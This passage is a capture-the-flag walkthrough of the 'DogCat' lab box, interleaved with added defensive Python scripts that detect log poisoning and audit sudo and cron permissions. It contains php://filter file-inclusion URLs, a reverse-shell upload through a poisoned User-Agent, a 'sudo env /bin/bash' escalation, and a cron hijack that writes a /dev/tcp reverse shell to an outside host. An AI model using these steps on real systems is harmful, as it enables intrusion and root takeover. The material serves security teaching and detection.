<p>Let’s see if we can grab the HTML code that processes our parameters in the browser address. This will help us understand what is happening on the backend. </p>
<p>We’ll use a simple PHP filter to convert the contents to <a href="https://blog.finxter.com/python-base64/" data-type="post" data-id="327003" target="_blank" rel="noreferrer noopener">base64</a> and output the raw base64 string. </p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../index</pre>
<p>Raw output:</p>
<pre class="wp-block-preformatted"><code>PCFET0NUWVBFIEhUTUw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+ZG9nY2F0PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Ii9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDxoMT5kb2djYXQ8L2gxPgogICAgPGk+YSBnYWxsZXJ5IG9mIHZhcmlvdXMgZG9ncyBvciBjYXRzPC9pPgoKICAgIDxkaXY+CiAgICAgICAgPGgyPldoYXQgd291bGQgeW91IGxpa2UgdG8gc2VlPzwvaDI+CiAgICAgICAgPGEgaHJlZj0iLz92aWV3PWRvZyI+PGJ1dHRvbiBpZD0iZG9nIj5BIGRvZzwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iLz92aWV3PWNhdCI+PGJ1dHRvbiBpZD0iY2F0Ij5BIGNhdDwvYnV0dG9uPjwvYT48YnI+CiAgICAgICAgPD9waHAKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICAkZXh0ID0gaXNzZXQoJF9HRVRbImV4dCJdKSA/ICRfR0VUWyJleHQiXSA6ICcucGhwJzsKICAgICAgICAgICAgaWYoaXNzZXQoJF9HRVRbJ3ZpZXcnXSkpIHsKICAgICAgICAgICAgICAgIGlmKGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICdkb2cnKSB8fCBjb250YWluc1N0cigkX0dFVFsndmlldyddLCAnY2F0JykpIHsKICAgICAgICAgICAgICAgICAgICBlY2hvICdIZXJlIHlvdSBnbyEnOwogICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgJF9HRVRbJ3ZpZXcnXSAuICRleHQ7CiAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgIGVjaG8gJ1NvcnJ5LCBvbmx5IGRvZ3Mgb3IgY2F0cyBhcmUgYWxsb3dlZC4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgPz4KICAgIDwvZGl2Pgo8L2JvZHk+Cgo8L2h0bWw+Cg== </code></pre>
<p>Let’s save this string as a file named “<code>string</code>”. Then we can use the command “<code>cat string | base64 -d</code>” to decrypt this string and view it as raw HTML code.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="917" height="604" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-43.png" alt="" class="wp-image-1184687" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-43.png 917w, https://blog.finxter.com/wp-content/uplo...00x198.png 300w, https://blog.finxter.com/wp-content/uplo...68x506.png 768w" sizes="(max-width: 917px) 100vw, 917px" /></figure>
</div>
<p>Reading over this HTML code, we can see that the file extension can be set! </p>
<p>If the user doesn’t specify the extension, the default will be <code>.php</code>. This means that we can add “<code>&ext=</code>” to the end of our web address to avoid the <code>.php</code> extension from being added. </p>
<p>In order for it to properly display our request, we need to include the word “dog” or “cat” in the address.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="942" height="520" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-42.png" alt="" class="wp-image-1184685" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-42.png 942w, https://blog.finxter.com/wp-content/uplo...00x166.png 300w, https://blog.finxter.com/wp-content/uplo...68x424.png 768w" sizes="(max-width: 942px) 100vw, 942px" /></figure>
</div>
<p>Let’s dive in with <code>burpsuite</code> and start intercepting and modifying requests.</p>
<p>Here is our order of steps for us to get our initial foothold on the target machine:</p>
<ol>
<li>Create a PHP reverse shell</li>
<li>Start up our <code>netcat</code> listener</li>
<li>Use <code>burp</code> to intercept and modify the web request. Wait until later to click “<code>forward</code>”.</li>
<li>Spin up a <a rel="noreferrer noopener" href="https://blog.finxter.com/python-one-liner-webserver/" data-type="post" data-id="8635" target="_blank">simple HTTP server </a>with Python in the same directory as the PHP revshell.</li>
<li>Click “<code>forward</code>” on <code>burp</code> to send the web request.</li>
<li>Activate the shell by entering: <code>$targetIP/bshell.php</code> in the browser address</li>
<li>Catch the revshell on <code>netcat</code>!</li>
</ol>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="713" height="826" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-50.png" alt="" class="wp-image-1184709" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-50.png 713w, https://blog.finxter.com/wp-content/uplo...59x300.png 259w" sizes="(max-width: 713px) 100vw, 713px" /></figure>
</div>
<h3>STEP 1</h3>
<p>Let’s create a PHP pentest monkey revshell.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="978" height="628" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-41.png" alt="" class="wp-image-1184683" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-41.png 978w, https://blog.finxter.com/wp-content/uplo...00x193.png 300w, https://blog.finxter.com/wp-content/uplo...68x493.png 768w" sizes="(max-width: 978px) 100vw, 978px" /></figure>
</div>
<h3>STEP 2</h3>
<p>Let’s first start up a <code>netcat</code> listener on port 2222.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nc -lnvp 2222</pre>
<h3>STEP 3</h3>
<p>Intercept the web request for the Apache2 log and modify the User-Agent field with a PHP code to request the <code>shell.php</code> code and rename it <code>bshell.php</code> on the target machine. </p>
<p>This will work only because upon examining the Apache2 logs, we noticed that the User-Agent field is unencoded and vulnerable to command injection. Make sure to wait to click forward until step 5.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="942" height="520" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-40.png" alt="" class="wp-image-1184682" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-40.png 942w, https://blog.finxter.com/wp-content/uplo...00x166.png 300w, https://blog.finxter.com/wp-content/uplo...68x424.png 768w" sizes="(max-width: 942px) 100vw, 942px" /></figure>
</div>
<h3>STEP 4</h3>
<p>We’ll spin up a simple python HTTP server in the same directory as our revshell to serve <code>shell.php</code> to our target machine via the modified web request we created in <code>burpsuite</code>.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="467" height="123" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-39.png" alt="" class="wp-image-1184681" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-39.png 467w, https://blog.finxter.com/wp-content/uplo...300x79.png 300w" sizes="(max-width: 467px) 100vw, 467px" /></figure>
</div>
<h3>STEP 5</h3>
<p>Click forward on burp and check to see if code 200 came through for <code>shell.php</code> on the HTTP server.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="465" height="271" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-38.png" alt="" class="wp-image-1184680" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-38.png 465w, https://blog.finxter.com/wp-content/uplo...00x175.png 300w" sizes="(max-width: 465px) 100vw, 465px" /></figure>
</div>
<h3>STEP 6</h3>
<p>Now we can trigger the shell from our browser and hopefully catch it as a reverse shell on our netcat listener.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="940" height="175" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-37.png" alt="" class="wp-image-1184679" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-37.png 940w, https://blog.finxter.com/wp-content/uplo...300x56.png 300w, https://blog.finxter.com/wp-content/uplo...68x143.png 768w" sizes="(max-width: 940px) 100vw, 940px" /></figure>
</div>
<h3>STEP 7</h3>
<p>We successfully caught it! Now we are in with our initial foothold!</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="458" height="202" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-36.png" alt="" class="wp-image-1184678" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-36.png 458w, https://blog.finxter.com/wp-content/uplo...00x132.png 300w" sizes="(max-width: 458px) 100vw, 458px" /></figure>
</div>
<h2>INITIAL FOOTHOLD</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="688" height="613" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-49.png" alt="" class="wp-image-1184708" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-49.png 688w, https://blog.finxter.com/wp-content/uplo...00x267.png 300w" sizes="(max-width: 688px) 100vw, 688px" /></figure>
</div>
<h3>LOCATE THE FIRST FLAG</h3>
<p>Let’s grab the first flag. We can fetch it from the browser again (base64-encoded, via the same php filter trick), or read it from the command line in the reverse shell.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../flag
PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=
</pre>
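<p>Both weaknesses used so far, the unencoded User-Agent written into the Apache log and the <code>view</code> parameter accepting <code>../</code> sequences and <code>php://filter</code> wrappers, leave clear traces in the access log, so this is where a defender would look first. The Python script below is an added example, not code from the original post or from the DogCat room: it parses a few constructed Apache combined-format lines modelled on the requests above, flags path traversal, stream wrappers, log-file reads and PHP tags in the User-Agent, and shows the allowlist lookup that would have stopped the inclusion in the first place (the file names in <code>ALLOWED_VIEWS</code> are assumed).</p>

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Apache "combined" log format:
#   host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (not taken from the real box). They mirror the
# request shapes the walkthrough describes: a normal view, the php://filter
# read of the flag, a traversal into the Apache log, and a User-Agent that
# carries a harmless PHP tag, which is the shape a log-poisoning attempt has.
SAMPLE_LOG = """\
10.6.2.23 - - [06/Mar/2023:04:41:00 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.6.2.23 - - [06/Mar/2023:04:41:05 +0000] "GET /?view=php://filter/read=convert.base64-encode/resource=./dog/../flag HTTP/1.1" 200 200 "-" "Mozilla/5.0"
10.6.2.23 - - [06/Mar/2023:04:41:09 +0000] "GET /?view=./dog/../../../../var/log/apache2/access.log HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
10.6.2.23 - - [06/Mar/2023:04:41:12 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "<?php echo 'poisoned'; ?>"
"""

# Allowlist for the `view` parameter: a fixed name-to-file map (file names are
# assumed). Anything not in the map is rejected, so traversal sequences and
# stream wrappers never reach include().
ALLOWED_VIEWS = {'dog': 'dog.php', 'cat': 'cat.php'}


def resolve_view(name):
    """Return the file for an allowlisted view name, or None for anything else."""
    return ALLOWED_VIEWS.get(name)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not fit."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def lfi_indicators(target):
    """Reasons a request target looks like file-inclusion abuse (may be empty)."""
    reasons = []
    query = urlparse(target).query
    for values in parse_qs(query, keep_blank_values=True).values():
        for raw in values:
            v = unquote(raw)  # parse_qs decoded once; this catches double encoding
            if '../' in v or '..\\' in v:
                reasons.append('path traversal')
            if re.match(r'^[a-z0-9.+-]+://', v, re.I):
                reasons.append('stream wrapper')
            if '/var/log/' in v or v.endswith('.log'):
                reasons.append('log file read')
    return reasons


def ua_indicators(user_agent):
    """Reasons a User-Agent looks like a log-poisoning payload (may be empty)."""
    if re.search(r'<\?(php|=)', user_agent, re.I):
        return ['code tag in User-Agent (log poisoning)']
    return []


def scan_log(text):
    """Return [(line_number, reasons)] for every suspicious line in the log."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            findings.append((n, ['unparseable line']))
            continue
        reasons = lfi_indicators(rec['target']) + ua_indicators(rec['ua'])
        if reasons:
            findings.append((n, reasons))
    return findings


if __name__ == '__main__':
    for n, reasons in scan_log(SAMPLE_LOG):
        print(f'line {n}: {", ".join(reasons)}')
```

<p>Run against the sample, lines 2, 3 and 4 are reported and line 1 is not. The allowlist in <code>resolve_view</code> is the real fix: a substring check for “dog” or “cat” is what let <code>./dog/../flag</code> through, whereas a dictionary lookup has no such loophole.</p>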
<p>Now we can decode this string (saved as <code>firstflag.txt</code>) with <code>base64</code>:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">base64 --decode firstflag.txt
<?php
$flag_1 = "THM{Th---omitted---fa}"
?>
</pre>
<h2>LOCAL RECON</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="689" height="854" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-48.png" alt="" class="wp-image-1184707" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-48.png 689w, https://blog.finxter.com/wp-content/uplo...42x300.png 242w" sizes="(max-width: 689px) 100vw, 689px" /></figure>
</div>
<h3>LOCATE THE SECOND FLAG</h3>
<p>We manually enumerate the filesystem and discover the second flag at <code>/var/www/flag2_QMW7JvaY2LvK.txt</code>.</p>
<p>The <code>find</code> command lets us quickly scan the filesystem for any file whose name contains the word “flag”:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">find / -type f -name '*flag*' 2>/dev/null</pre>
<p>We found the second flag in plaintext!</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cat flag2_QMW7JvaY2LvK.txt
THM{LF---omitted---fb}
</pre>
<h3>CHECK SUDO PERMISSIONS</h3>
<p>Let’s check out our sudo permissions with the command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo -l
Matching Defaults entries for www-data on 26e23794a52b:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on 26e23794a52b:
    (root) NOPASSWD: /usr/bin/env
</pre>
<h2>EXPLOIT/PRIVILEGE ESCALATION</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="607" height="914" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-47.png" alt="" class="wp-image-1184705" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-47.png 607w, https://blog.finxter.com/wp-content/uplo...99x300.png 199w" sizes="(max-width: 607px) 100vw, 607px" /></figure>
</div>
<p>Because we may run the <code>env</code> binary with sudo and without a password, and <code>env</code> simply executes whatever program it is given, we can become root with a single command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">$ sudo env /bin/bash</pre>
<p>Now we can verify that we are root with the command <code>whoami</code>.</p>
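<p>The <code>sudo -l</code> output above is exactly the kind of rule a sudoers review should catch before an attacker does: a NOPASSWD grant on a binary that runs arbitrary programs is a root shell by another name. The script below is an added example, not code from the original post or from the room: it parses a copy of that <code>sudo -l</code> output, extracts the rules, and flags any that hand root to a program launcher (the <code>PROGRAM_LAUNCHERS</code> set is an assumed, illustrative list, not an exhaustive one).</p>

```python
import re

# Copy of the `sudo -l` output shown in the walkthrough, used as sample input.
SUDO_L_OUTPUT = (
    "Matching Defaults entries for www-data on 26e23794a52b:\n"
    "    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:"
    "/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\n"
    "\n"
    "User www-data may run the following commands on 26e23794a52b:\n"
    "    (root) NOPASSWD: /usr/bin/env\n"
)

# Binaries that exec whatever program they are handed, so allowing them under
# sudo is equivalent to allowing an unrestricted root shell. Assumed and
# illustrative; a real audit would use a maintained list.
PROGRAM_LAUNCHERS = {'env', 'bash', 'sh', 'dash', 'zsh', 'find', 'python3',
                     'perl', 'vim', 'vi', 'nice', 'timeout', 'xargs'}

# One rule line looks like: "(runas) TAG: TAG: command[, command...]"
RULE_RE = re.compile(
    r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$'
)


def parse_sudo_l(text):
    """Turn `sudo -l` output into a list of {'runas', 'tags', 'cmd'} entries."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith('User ') and 'may run' in line:
            in_rules = True          # rule lines follow this header
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.rstrip(':') for t in m['tags'].split()]
        runas = m['runas'].split(':')[0].strip()   # "(root : root)" -> "root"
        for cmd in m['cmd'].split(','):
            rules.append({'runas': runas, 'tags': tags, 'cmd': cmd.strip()})
    return rules


def risky_rules(rules):
    """Rules that give root the ability to run arbitrary programs.

    Returns [(command, reasons)]; 'no password required' is recorded as an
    aggravating factor when the NOPASSWD tag is present.
    """
    out = []
    for r in rules:
        binary = r['cmd'].split()[0].rsplit('/', 1)[-1]
        if r['runas'] not in ('root', 'ALL'):
            continue
        if r['cmd'] != 'ALL' and binary not in PROGRAM_LAUNCHERS:
            continue
        reasons = ['runs arbitrary programs']
        if 'NOPASSWD' in r['tags']:
            reasons.append('no password required')
        out.append((r['cmd'], reasons))
    return out


if __name__ == '__main__':
    for cmd, reasons in risky_rules(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f'{cmd}: {", ".join(reasons)}')
```

<p>For the DogCat rule this reports <code>/usr/bin/env</code> with both reasons; a grant such as <code>(root) /usr/bin/apt-get update</code> is parsed but not reported, because the binary cannot be turned into a shell by its arguments alone. The fix on the defender's side is to grant only the specific command that is actually needed, never a launcher like <code>env</code>.</p>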
<h3>GRAB THE THIRD FLAG </h3>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cd /root
ls
flag3.txt
cat flag3.txt
THM{D1---omitted---12}
</pre>
<h2>POST-EXPLOITATION – BREAK OUT OF THE DOCKER CONTAINER</h2>
<p>Let’s start a new listener to catch the second bash shell, the one that will land outside of the container.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nc -lnvp 3333</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="627" height="259" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-35.png" alt="" class="wp-image-1184677" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-35.png 627w, https://blog.finxter.com/wp-content/uplo...00x124.png 300w" sizes="(max-width: 627px) 100vw, 627px" /></figure>
</div>
<p>We notice a <code>backup.sh</code> that runs regularly on a schedule via a cron job. Because the script is executed by root outside of the Docker container, we can hijack it by replacing its contents with a reverse shell.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">echo "#!/bin/bash">backup.sh;echo "bash -i>/dev/tcp/10.6.2.23/3333 0>&1">>backup.sh
flag4.txt
cat flag4.txt
THM{esc---omitted---2d}
</pre>
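<p>The container escape works because a script that root on the host runs from cron lives on a path that the container can write to. That is a misconfiguration a periodic audit can catch: every script referenced from a system crontab should be writable only by its owner, and so should its parent directory, or the file can simply be swapped out. The script below is an added example, not code from the original post or from the room: it pulls absolute paths out of a constructed system-format crontab, checks the file and its parent directory for group- or world-writable bits, and builds a throwaway scenario on disk (one locked-down script, one anybody can rewrite) to show the result.</p>

```python
import os
import re
import stat
import tempfile


def cron_script_paths(crontab_text):
    """Return (user, absolute_path) pairs from a system crontab.

    Assumes the 7-field system format (m h dom mon dow user command); variable
    assignments, comments and @reboot-style lines are skipped for brevity.
    """
    pairs = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith('#') or line.startswith('@'):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7 or '=' in fields[0]:
            continue
        user, command = fields[5], fields[6]
        for token in re.findall(r'(?<!\S)/\S+', command):   # absolute paths only
            pairs.append((user, token))
    return pairs


def loose_permissions(path):
    """Permission problems that let a non-owner change what cron will execute."""
    mode = os.lstat(path).st_mode
    reasons = []
    if mode & stat.S_IWGRP:
        reasons.append('group-writable')
    if mode & stat.S_IWOTH:
        reasons.append('world-writable')
    return reasons


def audit_cron(crontab_text):
    """Return [(user, path, reasons)] for scripts whose file or parent dir is loose."""
    findings = []
    for user, path in cron_script_paths(crontab_text):
        if not os.path.exists(path):
            continue
        reasons = loose_permissions(path)
        parent = os.path.dirname(path) or '/'
        reasons += ['parent dir ' + r for r in loose_permissions(parent)]
        if reasons:
            findings.append((user, path, reasons))
    return findings


def demo():
    """Constructed scenario: a locked-down script and one that anybody can rewrite."""
    workdir = tempfile.mkdtemp()            # mkdtemp creates the dir with mode 0700
    good = os.path.join(workdir, 'good.sh')
    bad = os.path.join(workdir, 'backup.sh')
    for path in (good, bad):
        with open(path, 'w') as fh:
            fh.write('#!/bin/bash\necho "backup done"\n')
    os.chmod(good, 0o755)                   # owner-only write: fine
    os.chmod(bad, 0o777)                    # anyone can replace the script body
    crontab = (
        'PATH=/usr/sbin:/usr/bin:/sbin:/bin\n'
        f'*/1 * * * * root {bad}\n'
        f'0 2 * * * root {good} --full\n'
    )
    return audit_cron(crontab)


if __name__ == '__main__':
    for user, path, reasons in demo():
        print(f'{user} runs {path}: {", ".join(reasons)}')
```

<p>Only <code>backup.sh</code> is reported. On a real host the same check should also cover anything bind-mounted into a container, since a container's root user writing to a shared volume is exactly how this box's <code>backup.sh</code> was taken over.</p>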
<h2>FINAL THOUGHTS</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="614" height="907" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-46.png" alt="" class="wp-image-1184704" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-46.png 614w, https://blog.finxter.com/wp-content/uplo...03x300.png 203w" sizes="(max-width: 614px) 100vw, 614px" /></figure>
</div>
<p>This box was a lot of fun. The bulk of the challenge was working towards gaining the initial foothold. </p>
<p>Once we secured a revshell, the rest of the box went pretty quickly. </p>
<p>The final step of breaking out of a Docker container with a second reverse shell was the sneakiest part for me. </p>
<p>The PHP directory traversal, combined with a php filter to base64-encode the output, was also a neat way to evade the input sanitization in place on the backend. </p>
</div>
https://www.sickgaming.net/blog/2023/03/...asy-video/